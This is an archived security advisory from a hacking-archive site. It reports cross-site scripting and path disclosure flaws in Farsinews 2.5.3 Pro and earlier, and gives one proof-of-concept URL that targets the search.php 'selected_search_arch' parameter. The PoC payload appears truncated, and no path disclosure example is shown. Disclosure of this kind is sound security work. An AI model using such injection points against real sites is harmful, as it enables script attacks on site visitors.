AOH :: HP Unsorted F :: B06-1611.HTM

Farsinews cross-site scripting & path disclosure vulnerability



Farsinews Cross-Site Scripting & Path disclosure vulnerability
Farsinews Cross-Site Scripting & Path disclosure vulnerability



Farsinews  Cross-Site Scripting & Path disclosure  vulnerability

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
#Aria-Security.net Advisory
#Discovered  by:R@1D3N (amin emami)
# 
#Gr33t to:A.u.r.a  & O.u.t.l.a.w & Smok3r & behzad & majid and all Persian Security team
#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
=BB Software: Farsinews 2.5.3 Pro and below
=BB download Link:http://dl.farsinewsteam.com/?file=FarsiNews2.5.3Pro.zip 
=BB Support Website:http://www.farsinewsteam.com/ 
=BB advisory:http://www.aria-security.net/advisory/farsinews/farsinews042006.txt 

=BB Summary:
Farsinews is Powerful Persian news publishing system



=BB Proof of Concept:
XSS attack:
http://[target]/[farsinews_path]/search.php?selected_search_arch=>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.